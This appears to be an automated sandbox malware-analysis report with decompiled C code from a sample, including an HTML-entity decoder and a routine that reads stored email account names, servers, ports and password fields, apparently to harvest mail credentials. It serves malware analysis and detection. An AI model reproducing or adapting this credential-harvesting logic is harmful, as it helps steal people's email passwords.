                                                                                                                                                    Function 0040F808 Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 99%
                                                                                                                                                    			E0040F808(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				void* _v11;
				char _v12;
				char _v13;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				signed int _v28;
				short _v30;
				short _v32;
				char* _v36;
				char* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char _v76;
				void _v88;
				intOrPtr _v92;
				char* _v96;
				char* _v100;
				intOrPtr _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				intOrPtr _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				intOrPtr _v156;
				char* _v160;
				char* _v164;
				char* _v168;
				intOrPtr _v172;
				char* _v176;
				char* _v180;
				char* _v184;
				char* _v188;
				char* _v192;
				char* _v196;
				intOrPtr _v200;
				char* _v204;
				char* _v208;
				char* _v212;
				char* _v216;
				char* _v220;
				char* _v224;
				char* _v228;
				intOrPtr _v232;
				char* _v236;
				char* _v240;
				char* _v244;
				char* _v248;
				char* _v252;
				intOrPtr _v256;
				char* _v260;
				char* _v264;
				char* _v268;
				char* _v272;
				char* _v276;
				char* _v280;
				intOrPtr _v284;
				char* _v288;
				char* _v292;
				char* _v296;
				intOrPtr _v300;
				char* _v304;
				char* _v308;
				char* _v312;
				char* _v316;
				char* _v320;
				char* _v324;
				intOrPtr _v328;
				char* _v332;
				char* _v336;
				char* _v340;
				char* _v344;
				char* _v348;
				char* _v352;
				char* _v356;
				char* _v360;
				char* _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				char* _v376;
				char* _v380;
				intOrPtr _v384;
				char* _v388;
				char* _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				char* _v404;
				char* _v408;
				intOrPtr _v412;
				char* _v416;
				char* _v420;
				char* _v424;
				char* _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				char* _v440;
				intOrPtr _v444;
				char* _v448;
				char* _v452;
				char* _v456;
				char* _v460;
				intOrPtr _v464;
				char* _v468;
				intOrPtr* _t200;
				char* _t202;
				char _t203;
				int _t205;
				int _t206;
				intOrPtr _t209;
				char* _t211;
				int _t213;
				void _t216;
				char _t220;
				void _t221;
				int _t226;
				signed int _t231;
				intOrPtr* _t232;
				void _t237;
				void* _t238;
				void* _t240;
				void* _t245;
				signed int _t246;
				signed int _t249;
				int _t250;
				void* _t251;
				int _t252;
				void* _t254;
				void* _t255;
				void* _t256;

				_v64 = "amp;";
				_v60 = "lt;";
				_v56 = "gt;";
				_v52 = "quot;";
				_v48 = "nbsp;";
				_v44 = "apos;";
				_v24 = 0x26;
				_v23 = 0x3c;
				_v22 = 0x3e;
				_v21 = 0x22;
				_v20 = 0x20;
				_v19 = 0x27;
				_v468 = "iexcl;";
				_v464 = "cent;";
				_v460 = "pound;";
				_v456 = "curren;";
				_v452 = "yen;";
				_v448 = "brvbar;";
				_v444 = "sect;";
				_v440 = "uml;";
				_v436 = "copy;";
				_v432 = "ordf;";
				_v428 = "laquo;";
				_v424 = "not;";
				_v420 = "shy;";
				_v416 = "reg;";
				_v412 = "macr;";
				_v408 = "deg;";
				_v404 = "plusmn;";
				_v400 = "sup2;";
				_v396 = "sup3;";
				_v392 = "acute;";
				_v388 = "micro;";
				_v384 = "para;";
				_v380 = "middot;";
				_v376 = "cedil;";
				_v372 = "sup1;";
				_v368 = "ordm;";
				_v364 = "raquo;";
				_v360 = "frac14;";
				_v356 = "frac12;";
				_v352 = "frac34;";
				_v348 = "iquest;";
				_v344 = "Agrave;";
				_v340 = "Aacute;";
				_v336 = "Acirc;";
				_v332 = "Atilde;";
				_v328 = "Auml;";
				_v324 = "Aring;";
				_v320 = "AElig;";
				_v316 = "Ccedil;";
				_v312 = "Egrave;";
				_v308 = "Eacute;";
				_v304 = "Ecirc;";
				_v300 = "Euml;";
				_v296 = "Igrave;";
				_v292 = "Iacute;";
				_v288 = "Icirc;";
				_v284 = "Iuml;";
				_v280 = "ETH;";
				_v276 = "Ntilde;";
				_v272 = "Ograve;";
				_v268 = "Oacute;";
				_v264 = "Ocirc;";
				_v260 = "Otilde;";
				_v256 = "Ouml;";
				_v252 = "times;";
				_v248 = "Oslash;";
				_v244 = "Ugrave;";
				_v240 = "Uacute;";
				_v236 = "Ucirc;";
				_v232 = "Uuml;";
				_v228 = "Yacute;";
				_v224 = "THORN;";
				_v220 = "szlig;";
				_v216 = "agrave;";
				_v212 = "aacute;";
				_v208 = "acirc;";
				_v204 = "atilde;";
				_t200 = _a8;
				_v28 = _v28 | 0xffffffff;
				_t231 = 0;
				_t254 = 0;
				_v200 = "auml;";
				_v196 = "aring;";
				_v192 = "aelig;";
				_v188 = "ccedil;";
				_v184 = "egrave;";
				_v180 = "eacute;";
				_v176 = "ecirc;";
				_v172 = "euml;";
				_v168 = "igrave;";
				_v164 = "iacute;";
				_v160 = "icirc;";
				_v156 = "iuml;";
				_v152 = "eth;";
				_v148 = "ntilde;";
				_v144 = "ograve;";
				_v140 = "oacute;";
				_v136 = "ocirc;";
				_v132 = "otilde;";
				_v128 = "ouml;";
				_v124 = "divide;";
				_v120 = "oslash;";
				_v116 = "ugrave;";
				_v112 = "uacute;";
				_v108 = "ucirc;";
				_v104 = "uuml;";
				_v100 = "yacute;";
				_v96 = "thorn;";
				_v92 = "yuml;";
				if( *_t200 == 0) {
					L45:
					_t202 = _a4 + _t231;
					 *_t202 = 0;
					if(_a20 == 0 || _t231 <= 0 ||  *((char*)(_t202 - 1)) != 0x20) {
						return _t202;
					} else {
						 *((char*)(_t202 - 1)) = 0;
						return _t202;
					}
				}
				while(_a12 == 0xffffffff || _a12 > _t254) {
					_t232 = _t254 + _t200;
					_t203 =  *_t232;
					_v13 = _t203;
					if(_t203 != 0x26) {
						L33:
						if(_a16 == 0 || _t203 > 0x20) {
							 *((char*)(_t231 + _a4)) = _t203;
							_t231 = _t231 + 1;
						} else {
							if(_t231 != _v28) {
								 *((char*)(_t231 + _a4)) = 0x20;
								_t231 = _t231 + 1;
								if(_a20 != 0 && _t231 == 1) {
									_t231 = 0;
								}
							}
							_v28 = _t231;
						}
						_t254 = _t254 + 1;
						L43:
						_t200 = _a8;
						if( *((char*)(_t254 + _t200)) != 0) {
							continue;
						}
						break;
					}
					_t249 = 0;
					_v36 = _t232 + 1;
					while(1) {
						_t205 = strlen( *(_t255 + _t249 * 4 - 0x3c));
						_v8 = _t205;
						_t206 = strncmp(_v36,  *(_t255 + _t249 * 4 - 0x3c), _t205);
						_t256 = _t256 + 0x10;
						if(_t206 == 0) {
							break;
						}
						_t249 = _t249 + 1;
						if(_t249 < 6) {
							continue;
						}
						_t209 = _a8;
						if( *((char*)(_t254 + _t209 + 1)) != 0x23) {
							L29:
							_v8 = _v8 & 0x00000000;
							while(1) {
								_t211 =  *(_t255 + _v8 * 4 - 0x1d0);
								_v40 = _t211;
								_t250 = strlen(_t211);
								_t213 = strncmp(_v36, _v40, _t250);
								_t256 = _t256 + 0x10;
								if(_t213 == 0) {
									break;
								}
								_v8 = _v8 + 1;
								if(_v8 < 0x5f) {
									continue;
								}
								_t203 = _v13;
								goto L33;
							}
							 *((char*)(_t231 + _a4)) = _v8 - 0x5f;
							_t231 = _t231 + 1;
							_t254 = _t254 + _t250 + 1;
							goto L43;
						}
						_t128 = _t209 + 2; // 0x2
						_t251 = _t254 + _t128;
						_t237 =  *_t251;
						if(_t237 == 0x78 || _t237 == 0x58) {
							_t159 = _t209 + 3; // 0x3
							_t245 = _t254 + _t159;
							_t238 = _t245;
							_t252 = 0;
							while(1) {
								_t216 =  *_t238;
								if(_t216 == 0) {
									break;
								}
								if(_t216 == 0x3b) {
									L27:
									if(_t252 <= 0) {
										goto L29;
									}
									memcpy( &_v88, _t245, _t252);
									 *((char*)(_t255 + _t252 - 0x54)) = 0;
									_t220 = E00406512( &_v88);
									_t256 = _t256 + 0x10;
									 *((char*)(_t231 + _a4)) = _t220;
									_t231 = _t231 + 1;
									_t254 = _t254 + _t252 + 4;
									goto L43;
								}
								_t252 = _t252 + 1;
								if(_t252 >= 4) {
									break;
								}
								_t238 = _t238 + 1;
							}
							_t252 = _t252 | 0xffffffff;
							goto L27;
						} else {
							_t240 = _t251;
							_t246 = 0;
							while(1) {
								_t221 =  *_t240;
								if(_t221 == 0) {
									break;
								}
								if(_t221 == 0x3b) {
									_v8 = _t246;
									L18:
									if(_v8 <= 0) {
										goto L29;
									}
									memcpy( &_v76, _t251, _v8);
									 *((char*)(_t255 + _v8 - 0x48)) = 0;
									_t226 = atoi( &_v76);
									_t256 = _t256 + 0x10;
									_v32 = _t226;
									_v12 = 0;
									asm("stosb");
									_v30 = 0;
									WideCharToMultiByte(0, 0,  &_v32, 0xffffffff,  &_v12, 2, 0, 0);
									 *((char*)(_t231 + _a4)) = _v12;
									_t231 = _t231 + 1;
									_t254 = _t254 + _v8 + 3;
									goto L43;
								}
								_t246 = _t246 + 1;
								if(_t246 >= 6) {
									break;
								}
								_t240 = _t240 + 1;
							}
							_v8 = _v8 | 0xffffffff;
							goto L18;
						}
					}
					 *((char*)(_t231 + _a4)) =  *((intOrPtr*)(_t255 + _t249 - 0x14));
					_t231 = _t231 + 1;
					_t254 = _t254 + _v8 + 1;
					goto L43;
				}
				goto L45;
			}



















































































































































                                                                                                                                                    0x0040f813
                                                                                                                                                    0x0040f81a
                                                                                                                                                    0x0040f821
                                                                                                                                                    0x0040f828
                                                                                                                                                    0x0040f82f
                                                                                                                                                    0x0040f836
                                                                                                                                                    0x0040f83d
                                                                                                                                                    0x0040f841
                                                                                                                                                    0x0040f845
                                                                                                                                                    0x0040f849
                                                                                                                                                    0x0040f84d
                                                                                                                                                    0x0040f851
                                                                                                                                                    0x0040f855
                                                                                                                                                    0x0040f85f
                                                                                                                                                    0x0040f869
                                                                                                                                                    0x0040f873
                                                                                                                                                    0x0040f87d
                                                                                                                                                    0x0040f887
                                                                                                                                                    0x0040f891
                                                                                                                                                    0x0040f89b
                                                                                                                                                    0x0040f8a5
                                                                                                                                                    0x0040f8af
                                                                                                                                                    0x0040f8b9
                                                                                                                                                    0x0040f8c3
                                                                                                                                                    0x0040f8cd
                                                                                                                                                    0x0040f8d7
                                                                                                                                                    0x0040f8e1
                                                                                                                                                    0x0040f8eb
                                                                                                                                                    0x0040f8f5
                                                                                                                                                    0x0040f8ff
                                                                                                                                                    0x0040f909
                                                                                                                                                    0x0040f913
                                                                                                                                                    0x0040f91d
                                                                                                                                                    0x0040f927
                                                                                                                                                    0x0040f931
                                                                                                                                                    0x0040f93b
                                                                                                                                                    0x0040f945
                                                                                                                                                    0x0040f94f
                                                                                                                                                    0x0040f959
                                                                                                                                                    0x0040f963
                                                                                                                                                    0x0040f96d
                                                                                                                                                    0x0040f977
                                                                                                                                                    0x0040f981
                                                                                                                                                    0x0040f98b
                                                                                                                                                    0x0040f995
                                                                                                                                                    0x0040f99f
                                                                                                                                                    0x0040f9a9
                                                                                                                                                    0x0040f9b3
                                                                                                                                                    0x0040f9bd
                                                                                                                                                    0x0040f9c7
                                                                                                                                                    0x0040f9d1
                                                                                                                                                    0x0040f9db
                                                                                                                                                    0x0040f9e5
                                                                                                                                                    0x0040f9ef
                                                                                                                                                    0x0040f9f9
                                                                                                                                                    0x0040fa03
                                                                                                                                                    0x0040fa0d
                                                                                                                                                    0x0040fa17
                                                                                                                                                    0x0040fa21
                                                                                                                                                    0x0040fa2b
                                                                                                                                                    0x0040fa35
                                                                                                                                                    0x0040fa3f
                                                                                                                                                    0x0040fa49
                                                                                                                                                    0x0040fa53
                                                                                                                                                    0x0040fa5d
                                                                                                                                                    0x0040fa67
                                                                                                                                                    0x0040fa71
                                                                                                                                                    0x0040fa7b
                                                                                                                                                    0x0040fa85
                                                                                                                                                    0x0040fa8f
                                                                                                                                                    0x0040fa99
                                                                                                                                                    0x0040faa3
                                                                                                                                                    0x0040faad
                                                                                                                                                    0x0040fab7
                                                                                                                                                    0x0040fac1
                                                                                                                                                    0x0040facb
                                                                                                                                                    0x0040fad5
                                                                                                                                                    0x0040fadf
                                                                                                                                                    0x0040fae9
                                                                                                                                                    0x0040faf3
                                                                                                                                                    0x0040faf6
                                                                                                                                                    0x0040fafa
                                                                                                                                                    0x0040fafc
                                                                                                                                                    0x0040fb00
                                                                                                                                                    0x0040fb0a
                                                                                                                                                    0x0040fb14
                                                                                                                                                    0x0040fb1e
                                                                                                                                                    0x0040fb28
                                                                                                                                                    0x0040fb32
                                                                                                                                                    0x0040fb3c
                                                                                                                                                    0x0040fb46
                                                                                                                                                    0x0040fb50
                                                                                                                                                    0x0040fb5a
                                                                                                                                                    0x0040fb64
                                                                                                                                                    0x0040fb6e
                                                                                                                                                    0x0040fb78
                                                                                                                                                    0x0040fb82
                                                                                                                                                    0x0040fb8c
                                                                                                                                                    0x0040fb96
                                                                                                                                                    0x0040fba0
                                                                                                                                                    0x0040fbaa
                                                                                                                                                    0x0040fbb1
                                                                                                                                                    0x0040fbb8
                                                                                                                                                    0x0040fbbf
                                                                                                                                                    0x0040fbc6
                                                                                                                                                    0x0040fbcd
                                                                                                                                                    0x0040fbd4
                                                                                                                                                    0x0040fbdb
                                                                                                                                                    0x0040fbe2
                                                                                                                                                    0x0040fbe9
                                                                                                                                                    0x0040fbf0
                                                                                                                                                    0x0040fbf7
                                                                                                                                                    0x0040fde5
                                                                                                                                                    0x0040fde8
                                                                                                                                                    0x0040fdee
                                                                                                                                                    0x0040fdf1
                                                                                                                                                    0x0040fe04
                                                                                                                                                    0x0040fdfd
                                                                                                                                                    0x0040fdfd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040fdfd
                                                                                                                                                    0x0040fdf1
                                                                                                                                                    0x0040fbfe
                                                                                                                                                    0x0040fc0d
                                                                                                                                                    0x0040fc10
                                                                                                                                                    0x0040fc14
                                                                                                                                                    0x0040fc17
                                                                                                                                                    0x0040fd94
                                                                                                                                                    0x0040fd98
                                                                                                                                                    0x0040fdd2
                                                                                                                                                    0x0040fdd5
                                                                                                                                                    0x0040fd9e
                                                                                                                                                    0x0040fda1
                                                                                                                                                    0x0040fda6
                                                                                                                                                    0x0040fdaa
                                                                                                                                                    0x0040fdaf
                                                                                                                                                    0x0040fdb6
                                                                                                                                                    0x0040fdb6
                                                                                                                                                    0x0040fdaf
                                                                                                                                                    0x0040fdb8
                                                                                                                                                    0x0040fdb8
                                                                                                                                                    0x0040fdd6
                                                                                                                                                    0x0040fdd7
                                                                                                                                                    0x0040fdd7
                                                                                                                                                    0x0040fdde
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040fdde
                                                                                                                                                    0x0040fc1d
                                                                                                                                                    0x0040fc20
                                                                                                                                                    0x0040fc23
                                                                                                                                                    0x0040fc27
                                                                                                                                                    0x0040fc31
                                                                                                                                                    0x0040fc37
                                                                                                                                                    0x0040fc3c
                                                                                                                                                    0x0040fc41
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040fc43
                                                                                                                                                    0x0040fc47
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040fc49
                                                                                                                                                    0x0040fc51
                                                                                                                                                    0x0040fd5c
                                                                                                                                                    0x0040fd5c
                                                                                                                                                    0x0040fd60
                                                                                                                                                    0x0040fd63
                                                                                                                                                    0x0040fd6b
                                                                                                                                                    0x0040fd73
                                                                                                                                                    0x0040fd7c
                                                                                                                                                    0x0040fd81
                                                                                                                                                    0x0040fd86
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040fd88
                                                                                                                                                    0x0040fd8f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040fd91
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040fd91
                                                                                                                                                    0x0040fdc5
                                                                                                                                                    0x0040fdc8
                                                                                                                                                    0x0040fdc9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040fdc9
                                                                                                                                                    0x0040fc57
                                                                                                                                                    0x0040fc57
                                                                                                                                                    0x0040fc5b
                                                                                                                                                    0x0040fc60
                                                                                                                                                    0x0040fd11
                                                                                                                                                    0x0040fd11
                                                                                                                                                    0x0040fd15
                                                                                                                                                    0x0040fd17
                                                                                                                                                    0x0040fd26
                                                                                                                                                    0x0040fd26
                                                                                                                                                    0x0040fd2a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040fd1d
                                                                                                                                                    0x0040fd2f
                                                                                                                                                    0x0040fd31
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040fd39
                                                                                                                                                    0x0040fd42
                                                                                                                                                    0x0040fd47
                                                                                                                                                    0x0040fd4f
                                                                                                                                                    0x0040fd52
                                                                                                                                                    0x0040fd55
                                                                                                                                                    0x0040fd56
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040fd56
                                                                                                                                                    0x0040fd1f
                                                                                                                                                    0x0040fd23
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040fd25
                                                                                                                                                    0x0040fd25
                                                                                                                                                    0x0040fd2c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040fc6f
                                                                                                                                                    0x0040fc6f
                                                                                                                                                    0x0040fc71
                                                                                                                                                    0x0040fc97
                                                                                                                                                    0x0040fc97
                                                                                                                                                    0x0040fc9b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040fc8e
                                                                                                                                                    0x0040fd0c
                                                                                                                                                    0x0040fca1
                                                                                                                                                    0x0040fca5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040fcb3
                                                                                                                                                    0x0040fcbb
                                                                                                                                                    0x0040fcc4
                                                                                                                                                    0x0040fcc9
                                                                                                                                                    0x0040fcd4
                                                                                                                                                    0x0040fce3
                                                                                                                                                    0x0040fceb
                                                                                                                                                    0x0040fcec
                                                                                                                                                    0x0040fcf0
                                                                                                                                                    0x0040fcfc
                                                                                                                                                    0x0040fd02
                                                                                                                                                    0x0040fd03
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040fd03
                                                                                                                                                    0x0040fc90
                                                                                                                                                    0x0040fc94
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040fc96
                                                                                                                                                    0x0040fc96
                                                                                                                                                    0x0040fc9d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040fc9d
                                                                                                                                                    0x0040fc60
                                                                                                                                                    0x0040fc7c
                                                                                                                                                    0x0040fc82
                                                                                                                                                    0x0040fc83
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040fc83
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • strlen.MSVCRT ref: 0040FC27
                                                                                                                                                    • strncmp.MSVCRT(?,00413F68,00000000,00413F68,?,?,?), ref: 0040FC37
                                                                                                                                                    • memcpy.MSVCRT ref: 0040FCB3
                                                                                                                                                    • atoi.MSVCRT ref: 0040FCC4
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 0040FCF0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                                                                                                                    • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                                                                    • API String ID: 1895597112-3210201812
                                                                                                                                                    • Opcode ID: e32dadd6ea65d4380dfb3bd6d4dee2632db13c381429c7de7dc985ffcf152ca1
                                                                                                                                                    • Instruction ID: 7b61ab7fda62f62168f3ac6a9ee0746413b6f8a7e258cbbb94e4f4552fbd63bc
                                                                                                                                                    • Opcode Fuzzy Hash: e32dadd6ea65d4380dfb3bd6d4dee2632db13c381429c7de7dc985ffcf152ca1
                                                                                                                                                    • Instruction Fuzzy Hash: 49F139B08012589EDB21CF95D8487DEBFB0AF96308F5481EAD5593B241C7B94BC9CF98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004106BE Relevance: 80.8, APIs: 23, Strings: 23, Instructions: 309stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                    			E004106BE(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				int _t58;
				int _t59;
				int _t60;
				int _t61;
				int _t63;
				void* _t96;
				void* _t99;
				void* _t102;
				void* _t105;
				void* _t108;
				void* _t111;
				void* _t114;
				void* _t117;
				void* _t123;
				void* _t194;
				void* _t196;
				void* _t201;
				char* _t202;

				_t194 = __edx;
				_t201 = __ecx;
				if(strcmp(__ecx + 0x46c, "Account_Name") == 0) {
					_t204 = _t201 + 0x460;
					E004060D0(0xff, _t201 + 0x870, E00406B74( *(_t201 + 0x460)));
					_t123 = E00406B74( *_t204);
					_t195 = _t201 + 0xf84;
					E004060D0(0xff, _t201 + 0xf84, _t123);
				}
				_t202 = _t201 + 0x46c;
				if(strcmp(_t202, "POP3_Server") == 0) {
					_t117 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x970;
					E004060D0(0xff, _t201 + 0x970, _t117);
				}
				if(strcmp(_t202, "IMAP_Server") == 0) {
					_t114 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x970;
					E004060D0(0xff, _t201 + 0x970, _t114);
				}
				if(strcmp(_t202, "NNTP_Server") == 0) {
					_t111 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x970;
					E004060D0(0xff, _t201 + 0x970, _t111);
				}
				if(strcmp(_t202, "SMTP_Server") == 0) {
					_t108 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x1084;
					E004060D0(0xff, _t201 + 0x1084, _t108);
				}
				if(strcmp(_t202, "POP3_User_Name") == 0) {
					_t105 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0xb70;
					E004060D0(0xff, _t201 + 0xb70, _t105);
					 *((intOrPtr*)(_t201 + 0xf70)) = 1;
				}
				if(strcmp(_t202, "IMAP_User_Name") == 0) {
					_t102 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0xb70;
					E004060D0(0xff, _t201 + 0xb70, _t102);
					 *((intOrPtr*)(_t201 + 0xf70)) = 2;
				}
				if(strcmp(_t202, "NNTP_User_Name") == 0) {
					_t99 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0xb70;
					E004060D0(0xff, _t201 + 0xb70, _t99);
					 *((intOrPtr*)(_t201 + 0xf70)) = 4;
				}
				if(strcmp(_t202, "SMTP_User_Name") == 0) {
					_t96 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x1284;
					E004060D0(0xff, _t201 + 0x1284, _t96);
					 *((intOrPtr*)(_t201 + 0x1684)) = 3;
				}
				_t58 = strcmp(_t202, "POP3_Password2");
				_t214 = _t58;
				if(_t58 == 0) {
					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t214, _t201, _t201 + 0x870);
				}
				_t59 = strcmp(_t202, "IMAP_Password2");
				_t215 = _t59;
				if(_t59 == 0) {
					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t215, _t201, _t201 + 0x870);
				}
				_t60 = strcmp(_t202, "NNTP_Password2");
				_t216 = _t60;
				if(_t60 == 0) {
					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t216, _t201, _t201 + 0x870);
				}
				_t61 = strcmp(_t202, "SMTP_Password2");
				_t217 = _t61;
				if(_t61 == 0) {
					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t217, _t201, _t201 + 0xf84);
				}
				if(strcmp(_t202, "NNTP_Email_Address") == 0) {
					E004060D0(0xff, _t201 + 0xe70, E00406B74( *((intOrPtr*)(_t201 + 0x460))));
				}
				_t63 = strcmp(_t202, "SMTP_Email_Address");
				if(_t63 == 0) {
					_t203 = _t201 + 0x460;
					E004060D0(0xff, _t201 + 0xe70, E00406B74( *(_t201 + 0x460)));
					_t63 = E004060D0(0xff, _t201 + 0x1584, E00406B74( *_t203));
				}
				_push("SMTP_Port");
				_t196 = _t201 + 0x46c;
				_push(_t196);
				L004115DC();
				if(_t63 == 0) {
					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
					 *(_t201 + 0x168c) = _t63;
				}
				_push("NNTP_Port");
				_push(_t196);
				L004115DC();
				if(_t63 == 0) {
					L35:
					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
					 *(_t201 + 0xf78) = _t63;
				} else {
					_push("IMAP_Port");
					_push(_t196);
					L004115DC();
					if(_t63 == 0) {
						goto L35;
					} else {
						_push("POP3_Port");
						_push(_t196);
						L004115DC();
						if(_t63 == 0) {
							goto L35;
						}
					}
				}
				_push("SMTP_Secure_Connection");
				_push(_t196);
				L004115DC();
				if(_t63 == 0) {
					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
					 *(_t201 + 0x1690) = _t63;
				}
				_push("NNTP_Secure_Connection");
				_push(_t196);
				L004115DC();
				if(_t63 == 0) {
					L41:
					 *((intOrPtr*)(_t201 + 0xf7c)) = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
				} else {
					_push("IMAP_Secure_Connection");
					_push(_t196);
					L004115DC();
					if(_t63 == 0) {
						goto L41;
					} else {
						_push("POP3_Secure_Connection");
						_push(_t196);
						L004115DC();
						if(_t63 == 0) {
							goto L41;
						}
					}
				}
				return 1;
			}























                                                                                                                                                    0x004106be
                                                                                                                                                    0x004106c2
                                                                                                                                                    0x004106de
                                                                                                                                                    0x004106e0
                                                                                                                                                    0x004106f5
                                                                                                                                                    0x004106fe
                                                                                                                                                    0x00410704
                                                                                                                                                    0x0041070a
                                                                                                                                                    0x0041070f
                                                                                                                                                    0x00410715
                                                                                                                                                    0x00410725
                                                                                                                                                    0x0041072d
                                                                                                                                                    0x00410733
                                                                                                                                                    0x00410739
                                                                                                                                                    0x0041073e
                                                                                                                                                    0x0041074e
                                                                                                                                                    0x00410756
                                                                                                                                                    0x0041075c
                                                                                                                                                    0x00410762
                                                                                                                                                    0x00410767
                                                                                                                                                    0x00410777
                                                                                                                                                    0x0041077f
                                                                                                                                                    0x00410785
                                                                                                                                                    0x0041078b
                                                                                                                                                    0x00410790
                                                                                                                                                    0x004107a0
                                                                                                                                                    0x004107a8
                                                                                                                                                    0x004107ae
                                                                                                                                                    0x004107b4
                                                                                                                                                    0x004107b9
                                                                                                                                                    0x004107c9
                                                                                                                                                    0x004107d1
                                                                                                                                                    0x004107d7
                                                                                                                                                    0x004107dd
                                                                                                                                                    0x004107e3
                                                                                                                                                    0x004107e3
                                                                                                                                                    0x004107fc
                                                                                                                                                    0x00410804
                                                                                                                                                    0x0041080a
                                                                                                                                                    0x00410810
                                                                                                                                                    0x00410816
                                                                                                                                                    0x00410816
                                                                                                                                                    0x0041082f
                                                                                                                                                    0x00410837
                                                                                                                                                    0x0041083d
                                                                                                                                                    0x00410843
                                                                                                                                                    0x00410849
                                                                                                                                                    0x00410849
                                                                                                                                                    0x00410862
                                                                                                                                                    0x0041086a
                                                                                                                                                    0x00410870
                                                                                                                                                    0x00410876
                                                                                                                                                    0x0041087c
                                                                                                                                                    0x0041087c
                                                                                                                                                    0x0041088c
                                                                                                                                                    0x00410891
                                                                                                                                                    0x00410895
                                                                                                                                                    0x004108aa
                                                                                                                                                    0x004108aa
                                                                                                                                                    0x004108b5
                                                                                                                                                    0x004108ba
